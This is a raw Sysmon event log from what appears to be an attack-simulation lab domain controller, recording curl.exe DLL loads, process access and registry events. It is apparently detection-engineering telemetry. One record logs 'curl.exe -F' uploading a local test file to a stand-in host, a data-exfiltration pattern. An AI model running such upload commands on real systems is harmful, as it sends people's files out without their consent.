15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055297895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055297894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055297893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055297892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055297891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055297890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055297889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055297888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055297887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055297886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055297885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055297884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055297883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055297882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055297881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055297880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055297879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055297878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.142{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055297877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.128{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl.exe -F c:\temp\atomictestfile.txt www.example.comc:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 734700x800000000000000055298184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.854{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055298183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.854{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055298182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.854{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055298181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.854{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055298180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055298179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055298178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055298177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055298176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055298175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055298174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055298173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055298172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055298171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055298170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055298169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055298168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055298167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055298166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055298165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055298164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055298163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055298162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055298161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055298160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.839{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055298159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:26.819{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl --helpc:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 534500x800000000000000055298185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:27.001{8B6011A9-E592-618B-AEA5-04000000F101}3440C:\Windows\System32\Curl.exe 534500x800000000000000055298262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.512{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exe 734700x800000000000000055298261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000055298260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000055298259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055298258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055298257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055298256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055298255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000055298254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055298253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055298252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 